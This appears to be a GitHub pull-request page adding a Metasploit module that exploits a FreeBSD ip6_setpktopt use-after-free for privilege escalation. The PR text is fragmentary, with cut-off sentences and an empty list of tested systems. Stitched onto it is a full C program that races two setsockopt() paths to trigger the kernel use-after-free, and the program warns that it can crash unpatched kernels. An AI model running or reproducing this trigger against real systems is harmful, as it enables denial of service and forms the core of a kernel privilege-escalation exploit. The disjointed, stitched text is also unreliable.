Add FreeBSD ip6_setpktopt Use-After-Free Privilege Escalation module #13837
Conversation
Reviewed and left a few minor change requests; code looks great overall.
documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md
Well, testing this from the current branch fails with the following error. If you could rebase this work onto
I moved past that, though, and tested it from a merged state, at which point it appears to have failed to compile. The target is a stock FreeBSD 12.0 system with
5273c5e to 95b99ce
Alright, tested successfully with a session opened via
Testing output
Release Notes
New module
This module exploits a race and use-after-free vulnerability in the FreeBSD kernel IPv6 socket handling. A missing synchronization lock in the `IPV6_2292PKTOPTIONS` option handling in `setsockopt` permits racing `ip6_setpktopt` access to a freed `ip6_pktopts` struct. This exploit overwrites the `ip6po_pktinfo` pointer of an `ip6_pktopts` struct in freed memory to achieve arbitrary kernel read/write.
This module has been tested successfully on:
Resolves #13826
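The race the description names can be exercised from user space by pitting the two `setsockopt(2)` paths against each other on one socket. The C harness below is an added example written for this page, not the module's own code, and it performs no privilege escalation: it only opens the window in which a zero-length `IPV6_2292PKTOPTIONS` call frees the socket's `ip6_pktopts` while a concurrent `IPV6_PKTINFO` call is being stored through `ip6_setpktopt`. It assumes, from the FreeBSD netinet6 sources rather than from this page, that a zero-length `IPV6_2292PKTOPTIONS` value is what frees the struct and that a sticky `IPV6_PKTINFO` with a non-zero interface index is what makes `ip6_setpktopt` allocate and write `ip6po_pktinfo`; the interface names `lo0` and `lo` are assumptions as well. On an unpatched 12.0 kernel this can crash the machine, so run it only in a disposable VM; on a patched kernel or another OS it just loops and exits 0.

```c
/*
 * Added example (not the Metasploit module's code): a two-thread harness
 * that races the two setsockopt() paths named in the module description.
 * No escalation is attempted; the program only creates the race window.
 *
 * Assumptions taken from FreeBSD's netinet6 sources, not from the PR page:
 *   - IPV6_2292PKTOPTIONS with a zero-length value reaches ip6_pcbopts(),
 *     which frees the socket's ip6_pktopts struct.
 *   - A sticky IPV6_PKTINFO with a non-zero ipi6_ifindex is stored by
 *     ip6_setpktopt(), which allocates ip6po_pktinfo inside that struct.
 */
#define _GNU_SOURCE          /* glibc hides struct in6_pktinfo otherwise */
#include <net/if.h>
#include <netinet/in.h>
#include <pthread.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

struct racer {
    int fd;
    unsigned iterations;
    unsigned failures;       /* setsockopt() calls that returned -1 */
};

/* Thread A: keep freeing the socket's ip6_pktopts via a zero-length option. */
static void *free_pktopts_loop(void *arg)
{
    struct racer *r = arg;
    for (unsigned i = 0; i < r->iterations; i++)
        if (setsockopt(r->fd, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, NULL, 0) == -1)
            r->failures++;
    return NULL;
}

/* Thread B: keep installing a sticky IPV6_PKTINFO (the ip6_setpktopt path). */
static void *set_pktinfo_loop(void *arg)
{
    struct racer *r = arg;
    struct in6_pktinfo pi;
    memset(&pi, 0, sizeof pi);           /* ipi6_addr stays :: */
    /* A non-zero interface index makes ip6_setpktopt() allocate and write
       ip6po_pktinfo instead of merely clearing it. Loopback names are an
       assumption; index 0 is the fallback if neither name resolves. */
    pi.ipi6_ifindex = if_nametoindex("lo0");
    if (pi.ipi6_ifindex == 0)
        pi.ipi6_ifindex = if_nametoindex("lo");
    for (unsigned i = 0; i < r->iterations; i++)
        if (setsockopt(r->fd, IPPROTO_IPV6, IPV6_PKTINFO, &pi, sizeof pi) == -1)
            r->failures++;
    return NULL;
}

/* Returns a UDP/IPv6 socket descriptor, or -1 if IPv6 is unavailable. */
int open_udp6_socket(void)
{
    return socket(AF_INET6, SOCK_DGRAM, 0);
}

/* Runs both loops concurrently on fd. Returns the number of setsockopt()
   calls that failed (0 on a healthy setup), or -1 if a thread could not
   be started. */
int race_pktopts(int fd, unsigned iterations)
{
    struct racer a = { fd, iterations, 0 };
    struct racer b = { fd, iterations, 0 };
    pthread_t ta, tb;

    if (pthread_create(&ta, NULL, free_pktopts_loop, &a) != 0)
        return -1;
    if (pthread_create(&tb, NULL, set_pktinfo_loop, &b) != 0) {
        pthread_join(ta, NULL);
        return -1;
    }
    pthread_join(ta, NULL);
    pthread_join(tb, NULL);
    return (int)(a.failures + b.failures);
}

int main(void)
{
    int fd = open_udp6_socket();
    if (fd < 0)
        return 1;
    int failed = race_pktopts(fd, 100000);
    close(fd);
    return failed == 0 ? 0 : 1;
}
```

Build with `cc -pthread race_pktopts.c`. `race_pktopts()` reports how many `setsockopt()` calls failed; both kernels accept these calls, so a non-zero count points at a setup problem (for example no IPv6 support on the host) rather than at the bug, and a clean exit on an unpatched kernel only means the window was not hit on that run.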